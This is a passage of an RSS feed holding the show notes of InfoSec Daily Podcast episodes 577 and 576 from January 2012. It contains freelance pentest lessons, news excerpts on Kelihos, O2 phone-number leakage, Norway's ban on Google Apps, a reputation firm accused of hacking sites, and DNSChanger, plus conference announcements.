<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Pentest Lessons:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Adam Compton &amp; Zac Wagle&#39;s should get credit for the &quot;Pentest Lessons&quot; idea. They also started a twitter account:</span><a href="https://twitter.com/pentestlessons"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://twitter.com/pentestlessons</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 1: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If you are beginning to freelance, make sure you have solid contracts and have a lawyer read the contract drafts. &nbsp;Core released some boilerplate examples about a year ago that are floating around on the internet available to freely use. &nbsp;Also, when you talk to a lawyer, don&rsquo;t make small talk. &nbsp;The rates they charge make pentesters look like a bunch of chumps, and they charge for every minute you have their attention.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 2:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Depending on the nature of your pentest, consider adding geography into the scope agreement. &nbsp;Shortly after Firesheep was released, I caught an executive of the company I was testing as he accessed wifi at the Starbucks down the street. &nbsp;The company attempted to invalidate the results because I did not have a specific clause stating that I could act outside of the physical building.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 3:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Many small-business IT outsourcing firms are now tacking &ldquo;Security&rdquo; onto their product offerings (for example &ldquo;Bob&rsquo;s Computers: Service, Sales, Security&rdquo;). &nbsp;As a result, many young techs are being shovelled into security audits without having any clue that security extends beyond asking if backups are being stored offsite, and that user drives have appropriate permissions. &nbsp;Fear not, there&rsquo;s a resource for this: THE PTES. &nbsp;Read it; use the appropriate sections, google the shit out of everything you don&rsquo;t understand.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">[Thanks listener Adam]</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.computerworld.com/s/article/9223667/Accused_Kelihos_botnet_maker_worked_for_two_security_firms"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.computerworld.com/s/article/9223667/Accused_Kelihos_botnet_maker_worked_for_two_security_firms</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A Russian man who was accused Monday by Microsoft of creating the Kelihos botnet worked for a pair of security-related firms from 2005 to 2011, according to evidence on the Web.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In an amended complaint filed yesterday in federal court, Microsoft identified the man as Andrey Sabelnikov of St. Petersburg.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to his LinkedIn profile, Sabelnikov worked for two Russian companies that specialize in security, including the antivirus firm Agnitum, for the last six years.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Agnitum, which is based in St. Petersburg, develops and sells a Windows antivirus product called OutPost Antivirus Pro as well as a personal firewall for Windows PCs. A company spokesman confirmed today that Sabelnikov worked for the firm from September 2005 until November 2008.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Sabelnikov held a number of tiles, ending his time with Agnitum as a project manager responsible for everything from &quot;designing the product architecture&quot; to &quot;implementing &#8230; critical parts of code.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In an emailed reply to questions, the Agnitum spokesman said that Sabelnikov &quot;resigned by his own will in late 2008.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">From November 2008 until December 2011, Sabelnikov worked for another Russian company, Retunil, which also markets security software. Returnil&#39;s primary product, Virtual System Pro, clones an existing copy of Windows in a virtual machine as a way to protect users from malware.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.thinkbroadband.com/news/4990-o2-shares-your-mobile-phone-number-with-every-website-you-visit.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.thinkbroadband.com/news/4990-o2-shares-your-mobile-phone-number-with-every-website-you-visit.html</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If you&#39;re reading this news article using your O2 mobile phone, you&#39;ll be pleased to know that O2 have already sent us your mobile phone number within the HTTP headers which normally contain information about how content can be displayed on your device. These headers are not normally seen by users, and usually not logged by most websites, but the flaw allows malicious sites to get more personal information about you than you may be willing to share.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For example, if you open an e-mail which includes references to external images, the mere action of opening the e-mail would divulge your phone number. This could be used by anyone undertaking a phishing attack or other scam to get more information from you. The opportunity to abuse this is potentially endless.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://blogs.ft.com/fttechhub/2012/01/google-faces-norwegian-public-sector-ban/#axzz1kPjBMnTo"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blogs.ft.com/fttechhub/2012/01/google-faces-norwegian-public-sector-ban/#axzz1kPjBMnTo</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Norwegian public sector organisations will be banned from using Google Apps after the Norwegian data protection authorities ruled that the service could put citizens&rsquo; personal data at risk.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The data protection authority said Google Apps did not comply with Norwegian privacy &nbsp;laws because there was insufficient information about where data was being kept. The decision came from a test case in Narvik, where the local council had chosen to use Google Apps for their email.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Norwegian ban comes just as things were going so well for Google Apps in Europe, with the company winning its largest ever contract with BBVA, the Spanish bank.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Now, however, Google could find access to swathes of public sector work effectively closed. Early last year, there was a similar decision in Denmark, where the town of Odense was banned from using Google Apps in its schools. Privacy regulators were concerned that if teachers used Google&rsquo;s document and calendar functions for lesson planning, student assessment and communicating with parents, it would leave some sensitive personal data at risk.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="https://www.net-security.org/secworld.php?id=12267"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.net-security.org/secworld.php?id=12267</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For individuals and companies that have a bad online reputation, online reputation management (ORM) services might sound like a good investment. Such services are not illegal, even though search engines such as Google do not look favorably upon them.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But every now and then, some firms offering those services succumb to the temptation of using illegal means to achieve their goal. And, according to Fox News, California-based Rexxfield is currently being accused of belonging to that group.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As Darren Meade, a former CEO of another California-based company, tells it, Rexxfield owner Michael Roberts shared with him his intent of buying and using hacking code to surreptitiously modify websites containing negative comments and make them drop down in search results.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The code in question allegedly allows users to inject a &quot;noindex&quot; tag into the source code of these sites, which makes search engine crawlers skip indexing them and, thus, effectively hiding them from the great majority of users. Roberts even demonstrated to Meade the effectiveness of the code in question by hacking Ripoff Report, a popular online consumer complaint site.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="https://www.networkworld.com/news/2012/012412-authorities-prepare-to-close-down-255242.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.networkworld.com/news/2012/012412-authorities-prepare-to-close-down-255242.html</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">German authorities are advising victims of DNSChanger Trojan programs to fix their computers&#39; Domain Name System settings using a free tool developed by antivirus company Avira, because the servers resolving DNS queries on their behalf will be closed down on March 8.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DNSChanger is a family of Trojans for Windows and Mac OS X whose primary function is to replace the DNS servers defined on the victim&#39;s computer with rogue ones operated by the malware&#39;s authors.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The DNS is a vital part of the Internet infrastructure and is used to resolve domain names into numerical IP addresses. By controlling DNS responses, the DNSChanger gang was able to redirect victims to rogue websites that distributed fraudulent software or displayed money-generating advertisements.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The DNSChanger operation was shut down by the U.S. Federal Bureau of Investigation in November last year following a two-year long investigation. The authorities estimated the number of computers infected with this type of Trojan at 500,000 in the U.S. and over 4 million worldwide. </span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-577-pentest-lessons-kelihos-o2mo-privacy-backlash-hiding-bad-reviews-dns-changer-change-back/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3415/0/infosec-daily-podcast-episode-577.mp3" length="18705600" type="audio/mpeg" />
		<itunes:duration>0:38:58</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 577 for January 25, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Varun Sharma.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered [...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 577 for January 25, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Varun Sharma.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on http://www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	Hit up anyone in NOVA Hackers
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	Pentest Lessons:
	Adam Compton &#38; Zac Wagle&#39;s should get credit for the &#34;Pentest Lessons&#34; idea. They also started a twitter account: https://twitter.com/pentestlessons.
	Lesson 1: If you are beginning to freelance, make sure you have solid contracts and have a lawyer read the contract drafts. &#160;Core released some boilerplate examples about a year ago that are floating around on the internet available to freely use. &#160;Also, when you talk to a lawyer, don&#8217;t make small talk. &#160;The rates they charge make pentesters look like a bunch of chumps, and they charge for every minute you [...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 576 &#8211; Encryption Legally Broken, Stop Scottish Farmers!, No GPS Tracking, No OPT Out &amp; SOPA/ACTA Hack</title>
		<link>http://www.isdpodcast.com/episode-576-encryption-legally-broken-stop-scottish-farmers-no-gps-tracking-no-opt-out-sopaacta-hack</link>
		<comments>http://www.isdpodcast.com/episode-576-encryption-legally-broken-stop-scottish-farmers-no-gps-tracking-no-opt-out-sopaacta-hack#comments</comments>
		<pubDate>Wed, 25 Jan 2012 03:58:07 +0000</pubDate>
		<dc:creator>Karthik.Rangarajan</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3412</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 576 for January 24, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Themson Mester, and Varun Sharma. &#160; Announcements: Unsung Heros Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; [...]]]></description>
			<content:encoded><![CDATA[<p><span id="internal-source-marker_0.2733774264938891" style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 576 for January 24, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Themson Mester, and Varun Sharma.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unsung Heros</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.c22.cc/2012/01/13/unsung-heros</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.ashimmy.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Schmoocon Epilogue</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: After Schmoocon</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington, DC</span><br />
